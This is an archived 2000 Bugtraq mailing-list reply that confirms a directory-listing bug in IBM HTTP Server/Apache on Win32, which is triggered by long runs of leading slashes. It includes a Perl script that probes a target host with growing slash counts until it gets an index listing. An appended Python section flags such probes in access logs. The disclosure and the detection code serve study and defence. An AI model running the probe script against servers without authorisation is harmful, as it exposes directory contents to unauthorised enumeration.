From: H D Moore [hdm@SECUREAUSTIN.COM]
Sent: Thursday, June 01, 2000 10:53 AM
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Re: IBM HTTP SERVER / APACHE

Hi,

I verified this on IBM_HTTP_SERVER/1.3.3 Apache/1.3.4-dev (Win32). The
number of /'s needed was exactly the same as Marek stated in his
original email (211 being the key number to retrieve an index listing).
Appended is an example perl script for finding _your_ magic number.

Is this a bug merely in IBM HTTPD or Apache Win32 in general? Does IBM
set some odd compile flag which triggers this bug in their version?
Anyone from the Apache group care to comment?

-HD
http://www.secureaustin.com (spidermap/nlog/etc)

Marek Roy wrote:
>
> I haven't seen any advisories for IBM HTTP SERVER running
> Apache.
> [ snip ]
> The number of "/" used to reproduce this can be different
> from one server to another. I don't have enough time to do
> more testing. However, feel free to add some more info to
> this quick advisory.

----[ sample scan script to find / offset ]----
(OMG it's PERL ;)

#!/usr/bin/perl
use LWP::Simple;
use strict;

my $host = shift() || die "usage: $0 [hostname]\n";
my $data;
my $odata;
my $i;

# Baseline: the normal response for "/"
$odata = get("http://$host/");
if ($odata eq "") { die "no response from server: $host\n"; }

# Add one leading slash per request until the response differs from the baseline
for ($i = 2; $i < 4096; $i++) {
    print "Trying $i...\n";
    $data = get("http://$host" . ("/" x $i));
    if ($data ne $odata) {
        print "/ = $i\n\n$data\n\n";
        exit;
    }
}
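As an added defender-side example (not part of the thread or of the script above): both the bug's trigger and the script's probing leave a distinctive footprint in the web server's access log. The Python below parses Apache common-format log lines, flags requests whose path begins with a long run of slashes, and separately finds source addresses that walked through many run lengths the way the script does; the log lines, thresholds and IP addresses are constructed for illustration.

```python
import re
from collections import defaultdict

# Apache common/combined log format; the request line is the quoted field.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+')

def leading_slash_run(path):
    # Length of the run of "/" characters at the start of the request path.
    return len(path) - len(path.lstrip("/"))

def parse_line(line):
    # Parsed fields of one access-log line, or None if the line does not match.
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["status"] = int(d["status"])
    d["run"] = leading_slash_run(d["path"])
    return d

def flag_slash_probes(lines, threshold=8):
    # Requests whose path starts with at least `threshold` slashes. A 200 on such
    # a path is the case the thread describes (index listing served instead of "/").
    hits = []
    for line in lines:
        e = parse_line(line)
        if e and e["run"] >= threshold:
            hits.append({"ip": e["ip"], "run": e["run"], "status": e["status"]})
    return hits

def find_sweeps(lines, min_distinct=20):
    # Source IPs that tried many distinct run lengths: the footprint of the
    # thread's scan script, which walks 2..4095 until the response changes.
    runs = defaultdict(set)
    for line in lines:
        e = parse_line(line)
        if e and e["run"] >= 2:
            runs[e["ip"]].add(e["run"])
    return {ip: len(s) for ip, s in runs.items() if len(s) >= min_distinct}

# Constructed sample lines (not from the thread): a normal request, a benign
# double slash, one 211-slash request answered 200, and a 2..40 sweep from a second host.
def _line(ip, path, sec):
    return f'{ip} - - [01/Jun/2000:10:53:{sec:02d} -0500] "GET {path} HTTP/1.0" 200 1432'

SAMPLE_LOG = [_line("203.0.113.7", "/", 1), _line("203.0.113.7", "//index.html", 2),
              _line("203.0.113.7", "/" * 211, 3)]
SAMPLE_LOG += [_line("198.51.100.9", "/" * k, k) for k in range(2, 41)]
```

A benign double slash (as in `//index.html`) stays below the threshold, so the first function reports only the long runs, while the second catches the sweep even when every individual probe looks unremarkable.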